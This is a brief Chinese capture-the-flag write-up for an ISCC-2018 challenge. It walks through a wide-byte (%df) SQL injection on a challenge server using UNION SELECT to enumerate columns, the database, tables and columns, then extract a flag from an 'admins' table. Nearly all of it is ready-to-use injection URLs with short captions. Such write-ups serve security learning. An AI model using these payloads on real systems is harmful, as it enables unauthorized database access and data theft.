ISCC-2018

SQL 注入的艺术

在源码看到gb2312,宽字节注入无疑

 

查字段   

         http://118.190.152.202:8015/index.php?id=1%df' order by 8%23

 

回显字段

http://118.190.152.202:8015/index.php?id=-1%df' UNION SELECT 1,2,3,4,5,6,7,8%23

　　

　　　　

查库

　http://118.190.152.202:8015/index.php?id=-1%df' UNION SELECT 1,2,3,database(),5,6,7,8%23

爆表得admins

http://118.190.152.202:8015/index.php?id=-1%df' UNION SELECT 1,2,3,table_name,5,6,7,8+from+information_schema.tables+where+table_schema=database()+limit+0,1%23

爆列名得flag列

http://118.190.152.202:8015/index.php?id=-1%df' UNION SELECT 1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e73+limit+7,1%23

拿flag

http://118.190.152.202:8015/index.php?id=-1%df' UNION SELECT 1,2,3,flag,5,6,7,8+from+admins%23